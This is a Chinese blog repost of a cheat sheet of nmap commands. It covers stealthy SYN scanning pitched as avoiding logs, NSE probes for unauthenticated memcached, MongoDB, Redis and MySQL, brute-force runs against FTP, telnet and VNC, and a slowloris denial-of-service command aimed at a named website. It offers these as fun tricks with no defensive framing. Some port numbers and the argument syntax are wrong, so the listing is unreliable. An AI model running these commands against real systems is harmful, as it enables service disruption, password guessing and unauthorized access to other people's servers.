在
nmap中,除了最基本的端口扫描之外,还有很多很好玩的用法。你知道吗?本文为大家记录些不常用但一定要熟知的命令。
扫描相关
基于icmp的扫描
nmap -sP 192.168.123.173
对目标半开放式端口扫描不想在留下日志记录。
nmap -sS -p 22 80 3306 192.168.123.173
审计相关
iis短文件名泄露(适用于Windows服务器)
nmap -p 80 --script http-iis-short-name-brute 192.168.123.173
Memcached未授权访问漏洞
nmap -sV -p 1121 -script memcached-info 192.168.123.173
mongodb未授权访问
nmap -p 27017 --script mongodb-info 192.168.123.173
redis未授权访问
nmap -p 6370 --script redis-info 192.168.123.173
弱口令 DDOS相关
没错,nmap可以进行Ddos。
nmap --script http-slowloris --max-parallelism 400 blog.bbskali.cn
ftp弱口令暴力破解
nmap --script ftp-brute --script-args brute.emptypass=true,ftp-brute.timeout=30,userdb=/root/zi.txt,brute.useraspass=true,passdb=/root/passwords.txt,brute.threads=3,brute.delay=6 192.168.123.173
mysql匿名访问
nmap --script mysql-empty-password 192.168.123.173
验证ssl-cert证书问题
nmap -v -v --script ssl-cert blog.bbskali.cn
验证SSL证书的有限期
nmap -Pn --script ssl-date blog.bbskali.cn
暴力破解telnet
nmap -p 23 --script telnet-brute --script-args userdb=myusers.lst,passdb=mypwds.lst --script-args telnet-brute.timeout=8s 192.168.123.173
精准地确认端口上运行的服务
nmap -sV --script unusual-port 192.168.123.173
收集VNC信息
nmap --script vnc-info 192.168.123.173
暴力破解VNC
nmap --script vnc-brute --script-args brute.guesses=6,brute.emptypass=true,userdb=/root/zi.txt,brute.useraspass=true,passdb=/root/zi.txt,brute.retries=3,brute.threads=2,brute.delay=3 192.168.123.173更多精彩文章 欢迎关注我们
原文始发于微信公众号(kali黑客笔记):Nmap哪些想不到的姿势
版权声明:本文内容由互联网用户自发贡献,该文观点仅代表作者本人。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如发现本站有涉嫌侵权/违法违规的内容, 请发送邮件至 举报,一经查实,本站将立刻删除。
文章由极客之音整理,本文链接:https://www.bmabk.com/index.php/post/152041.html
